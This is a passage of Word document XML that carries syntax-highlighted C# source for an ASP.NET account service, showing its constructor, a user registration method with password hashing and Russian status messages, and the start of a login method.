        <w:t>AccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>IBaseRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">&lt;User&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2FEA9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ILogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>AccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&gt; logger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E07722" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E470FBF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733D54C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            _logger = logger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8AB1C8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D31216" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6993F6"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async</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> Task&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>BaseResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ClaimsIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Register(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>RegisterViewModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E0029" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F38FCCA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68468754" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C29953" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> user = </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository.GetAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>FirstOrDefaultAsync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">(x =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>x.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>model.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880EFFF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>user !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35840ABD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259CCD3A"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0B79F860" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="001F04F3" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A273B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"Пользователь с таким логином уже есть"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFF0A8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC017EE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362B018" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0A701E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                user = </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>User(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C2237" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039605D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>model.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04329519" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Role = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Role.User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E943C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Password = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>HashPassword.HashPassowrd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>model.Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD98575" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E1B42B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC9A737" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository.Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220E1C3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> result = Authenticate(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281EE8D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA96299"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16387D72" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10314D9E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Data = result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B59A6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Description = </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>Объект</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>добавился</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2B186F"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OK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29554014" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46880C84" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C550834" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> (Exception ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1528B472" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F2F23" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>logger.LogError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">(ex, </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">$"[Register]: </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ex.Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0349E"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724F889B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038A222" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Description = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ex.Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0EE0F"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InternalServerError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69A98B17" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849E2CC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358E8619" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB4CB1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2779F373"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async</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> Task&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>BaseResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ClaimsIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Login(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>LoginViewModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D51C1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB61DD3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2F0C8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC0D48" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> user = </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository.GetAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>FirstOrDefaultAsync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">(x =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>x.Name</w:t>
      </w:r>
